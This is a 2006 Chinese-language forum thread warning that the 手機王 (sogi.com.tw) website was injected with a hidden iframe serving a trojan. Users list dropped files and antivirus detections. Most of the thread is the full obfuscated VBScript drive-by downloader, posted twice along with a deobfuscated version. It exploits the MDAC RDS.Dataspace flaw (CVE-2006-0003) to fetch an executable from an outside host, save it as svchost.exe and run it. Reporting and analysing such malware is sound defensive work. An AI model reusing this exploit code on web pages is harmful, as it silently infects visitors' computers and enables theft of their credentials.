手機王又被植入木馬了
贊助商連結
hcchen 2006-10-29, 12:18 PM <IFRAME src="http://www.myemage.com/V20/Daren/images/***.***" width=0 height=0></IFRAME>
會經由該網頁下載檔案svchost.exe並執行。
但是會出現svchost.exe並不是標準的32位元應用程式,然後跟著下載2.exe
該木馬的目的:未知
那怎麼知道自己中標了:
檢查C:\Documents and Settings\使用者名稱\Local Settings\Temp下是否有
svchost.exe
檔案大小:59.0 KB (60,468 位元組)
檢查C:\Documents and Settings\使用者名稱\Local Settings\Temporary Internet Files下是否有
2.exe
檔案大小:59.0 KB (60,468 位元組)
會在C:\WINDOWS\system32下產生
gfile.dll、goodfile.exe 2個檔案
---------------------------------------------------------------------
總之,近期上手機王的自己小心了............
贊助商連結
fq4lxx92 2006-10-29, 12:43 PM 還好我都是用狐狸瀏覽,一步步將2.exe抓下來,卡巴6.0.1.408 2006/10/29 10:45:45 抓不到:|||: ,但是....看圖就知道。
DarkSkyline 2006-10-29, 12:47 PM 連到 www.sogi.com.tw 會自動下載 gfile.dll 到c:\windows\system32\資料夾底下, AntiVir PersonalEdition Premium找到"HEUR/Malware"病毒,請大家測試一下自己的防毒軟體....^_^
BitDefender 2006-10-29, 02:00 PM BitDefender Antivirus v10找到病毒
Infected: Dropped:Generic.Lineage.06B7FB77
2000 的 IE6 完全沒有反應?在 system32 和 temp 目錄沒有找到上述的檔案。
esjustin 2006-10-29, 02:23 PM Mcafee 的未知防禦技術可以偵測到喔~:)
用FF可以防止中毒...
2.exe
卡巴更新真快
已偵測為Trojan-PSW.Win32.OnLineGames.as
F-Prot 3.16f 10.28.2006 Possibly a new variant of W32/Threat-IKNP-based!Maximus
對了f-secure不是有F-Prot的引擎嗎,當kav尚未更新時
f-secure的f-Prot能以啟發式抓到嗎?
f-secure的使用者能試試..........:D
f-secure "online scanner"2.1似乎不行 ........ :|||:
(f-secure的更新跟kav有時差?!> <,而f-secure的f-Pro也..........)
http://MystiPix.com/omeylfjd.jpg
hcchen 2006-10-29, 04:39 PM Microsoft Windows MDAC 漏洞 - CVE-2006-0003:
作爲 ActiveX 數據對象 (ADO) 的一部分提供並在 MDAC 中分發的
RDS.Dataspace ActiveX 控件中存在一個遠程代碼執行漏洞。 成功利用此漏
洞的攻擊者可以完全控制受影響的系統。以下爲使用此漏洞通過網頁散播木馬
--------------------------------------------------------------------------
手機王網頁木馬原始碼:
<script language="VBScript">
on error resume next
dl="http://www.myemage.com/V20/Daren/images/*.exe"
j1="clsid:"
j2="BD96"
j3="C556-"
j4="65A3-"
j5="11D0-"
j6="983A-"
j7="00C04FC29E36"
j8=j1&j2&j3&j4&j5&j6&j7
xx="object"
xxx="classid"
xxxx="Scripting.FileSystemObject"
dd="open"
Set df = document.createElement(xx)
df.setAttribute xxx, j8
b4="Mi"
b5="cr"
b6="o"
b7="soft"
b8=".X"
b9="M"
b10="L"
b11="H"
b12="T"
b13="T"
b14="P"
strb1=b4&b5&b6&b7&b8&b9
strb2=b10&b11&b12&b13&b14
strb=strb1&strb2
Set x = df.CreateObject(strb,"")
a4="A"
a5="d"
a6="o"
a7="d"
a8="b"
a9="."
a10="S"
a11="t"
a12="r"
a13="e"
a14="a"
a15="m"
strd1=a4&a5&a6&a7&a8&a9
strd2=a10&a11&a12&a13&a14&a15
strd=strd1&strd2
set SS = df.createobject(strd,"")
SS.type = 1
f4="G"
f5="E"
f6="T"
stre=f4&f5&f6
x.Open stre, dl, False
x.Send
marco1="svchost.exe"
set F = df.createobject(xxxx,"")
tmp2=2
set tmp = F.GetSpecialFolder(tmp2)
SS.open
marco1= F.BuildPath(tmp,marco1)
SS.write x.responseBody
SS.savetofile marco1,2
SS.close
z1="She"
z2="ll.A"
z3="ppli"
z4="cat"
z5="io"
z6="n"
zz=z1&z2&z3&z4&z5&z6
set Q = df.createobject(zz,"")
Q.ShellExecute marco1,"","",dd,0
</script>
還原:
<script language="VBScript">
on error resume next
dl="http://www.myemage.com/V20/Daren/images/*.exe"
j8="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
xx="object"
xxx="classid"
dd="open"
Set df = document.createElement(xx)
df.setAttribute xxx, j8
strb="Microsoft.XMLHTTP"
Set x = df.CreateObject(strb,"")
strd="Adodb.Stream"
set SS = df.createobject(strd,"")
SS.type = 1
stre="GET"
x.Send
marco1="svchost.exe"
set F = df.createobject(xxxx,"")
tmp2=2
set tmp = F.GetSpecialFolder(tmp2)
SS.open
marco1= F.BuildPath(tmp,marco1)
SS.write x.responseBody
SS.close
zz="Shell.Application"
set Q = df.createobject(zz,"")
Q.ShellExecute marco1,"","",dd,0
</script>
http://www.microsoft.com/taiwan/technet/security/bulletin/MS06-014.mspx
hwwgo 2006-10-29, 04:53 PM Microsoft Windows MDAC 漏洞 - CVE-2006-0003:
作爲 ActiveX 數據對象 (ADO) 的一部分提供並在 MDAC 中分發的
RDS.Dataspace ActiveX 控件中存在一個遠程代碼執行漏洞。 成功利用此漏
洞的攻擊者可以完全控制受影響的系統。以下爲使用此漏洞通過網頁散播木馬
--------------------------------------------------------------------------
手機王網頁木馬原始碼:
<script language="VBScript">
on error resume next
dl="http://www.myemage.com/V20/Daren/images/*.exe"
j1="clsid:"
j2="BD96"
j3="C556-"
j4="65A3-"
j5="11D0-"
j6="983A-"
j7="00C04FC29E36"
j8=j1&j2&j3&j4&j5&j6&j7
xx="object"
xxx="classid"
xxxx="Scripting.FileSystemObject"
dd="open"
Set df = document.createElement(xx)
df.setAttribute xxx, j8
b4="Mi"
b5="cr"
b6="o"
b7="soft"
b8=".X"
b9="M"
b10="L"
b11="H"
b12="T"
b13="T"
b14="P"
strb1=b4&b5&b6&b7&b8&b9
strb2=b10&b11&b12&b13&b14
strb=strb1&strb2
Set x = df.CreateObject(strb,"")
a4="A"
a5="d"
a6="o"
a7="d"
a8="b"
a9="."
a10="S"
a11="t"
a12="r"
a13="e"
a14="a"
a15="m"
strd1=a4&a5&a6&a7&a8&a9
strd2=a10&a11&a12&a13&a14&a15
strd=strd1&strd2
set SS = df.createobject(strd,"")
SS.type = 1
f4="G"
f5="E"
f6="T"
stre=f4&f5&f6
x.Open stre, dl, False
x.Send
marco1="svchost.exe"
set F = df.createobject(xxxx,"")
tmp2=2
set tmp = F.GetSpecialFolder(tmp2)
SS.open
marco1= F.BuildPath(tmp,marco1)
SS.write x.responseBody
SS.savetofile marco1,2
SS.close
z1="She"
z2="ll.A"
z3="ppli"
z4="cat"
z5="io"
z6="n"
zz=z1&z2&z3&z4&z5&z6
set Q = df.createobject(zz,"")
Q.ShellExecute marco1,"","",dd,0
</script>
還原:
<script language="VBScript">
on error resume next
dl="http://www.myemage.com/V20/Daren/images/*.exe"
j8="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
xx="object"
xxx="classid"
dd="open"
Set df = document.createElement(xx)
df.setAttribute xxx, j8
strb="Microsoft.XMLHTTP"
Set x = df.CreateObject(strb,"")
strd="Adodb.Stream"
set SS = df.createobject(strd,"")
SS.type = 1
stre="GET"
x.Send
marco1="svchost.exe"
set F = df.createobject(xxxx,"")
tmp2=2
set tmp = F.GetSpecialFolder(tmp2)
SS.open
marco1= F.BuildPath(tmp,marco1)
SS.write x.responseBody
SS.close
zz="Shell.Application"
set Q = df.createobject(zz,"")
Q.ShellExecute marco1,"","",dd,0
</script>
怎麽才能做到還原的?
|